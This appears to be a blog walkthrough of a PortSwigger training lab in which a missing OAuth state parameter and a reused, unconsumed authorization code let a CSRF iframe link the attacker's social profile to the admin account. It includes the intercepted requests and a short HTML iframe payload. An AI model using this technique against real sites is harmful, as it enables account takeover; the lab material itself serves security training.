Skip to main content

Command Palette

Search for a command to run...

LAB #02 Forced OAuth profile linking

Understanding and exploiting an insecure OAuth account-linking implementation.

Updated
3 min readView as Markdown
LAB #02 Forced OAuth profile linking
A
I write about cybersecurity, and simple tech guides.

Lab Overview

This lab gives you the option to attach a social media profile to your account so that you can log in via OAuth instead of using the normal username and password. Due to the insecure implementation of the OAuth flow by the client application, an attacker can manipulate this functionality to obtain access to other users' accounts.

To solve the lab, use a CSRF attack to attach your own social media profile to the admin user's account on the blog website, then access the admin panel and delete carlos.

The admin user will open anything you send from the exploit server and they always have an active session on the blog website.

Credentials:

  • Blog website account: wiener:peter

  • Social media profile: peter.wiener:hotdog

Exploitation

#1 Logging In

As usual, after starting the lab, the provided credentials were used to log in through social media while Burp Suite captured the traffic.

Standard Authorization Code flow typically includes:

PARAMETER PURPOSE
response_type Usually code for the Authorization Code flow.
client_id Identifies the application requesting authorization.
redirect_uri The URL where the authorization server redirects the user after authentication.
scope Specifies the permissions being requested (e.g., openid profile email).
state Random value to prevent CSRF attacks. Must be validated on return.

Before entering the credential we captured the request which is usually using OAuth.

client_id: xdddru0pg8uxl4hrty90s redirect_uri: https://0aad003a0374551380a2a3b800a00051.web-security-academy.net/oauth-login response_type: code scope: openid%20profile%20email

Here we can see that the scope is missing.

Now login with the credentials:

Now logout and login with Blog website account:

We have successfully login with the Blog website account.
There is a option to Attach a social profile click it.

Click continue and capture the request

client_id: d3rj4i8qd6vgrplhnrebp redirect_uri: https://0a0100260389c4908037946a007c0037.web-security-academy.net/oauth-linking response_type: code scope: openid%20profile%20email

Here the redirect_uri is different. still there is no state parameter on this

It is a redirection to /auth which a OAuth login prosses

#2 Reusing an OAuth Authorization Code

After the social provider authenticates you, it redirects back to the application with a request like:

GET /oauth-linking?code=abc123...

The code is a temporary OAuth authorization code.

Intercept this request in Burp Suite and drop it.

  • Dropping the request prevents the application from exchanging the code for an access token.

  • The authorization code remains unused and is still valid for a short period.

First forward the request:

We will get this request with the code in it and drop it

code: RekBTYufEbFhJNShAhVyTF-p5ui8kFkr8fMFtBDb3UJ

Copy the URL containing the code

#3 Crafting the Payload

Logout and click the exploit server.

Now create a CSRF PoC and deliver it to the victim.

<html>
    <head>
        <title>PAYLOAD</title>
    </head>
    <body>
        <iframe src="https://0a14008c046c044e838964cb00de001f.web-security-academy.net/oauth-linking?code=pbjHxFLY7qTs-7DX_CleYFtBe4Kf2dq1c9p_n3dlqOJ"></iframe>
    </body>
</html>

First "store" the payload then "Deliver exploit to the victim"

#4 Confirming the Attack

Login again with "Login with social media".

Successfully logged in as administrator .

Got the access to admin panel.

The goal was to access the admin panel and delete carlos.

Deleted carlos!

# And That’s a Wrap

OAuth implementations should be tested just as carefully as any other authentication mechanism.

Portswigger Labs Journal

Part 1 of 2

Solve PortSwigger Web Security Academy labs with simple, practical walkthroughs covering web vulnerabilities, Burp Suite techniques, exploitation methods, and real world penetration testing skills.

Up next

LAB #01 SSRF via OpenID dynamic client registration

Understanding OpenID Dynamic Client Registration Abuse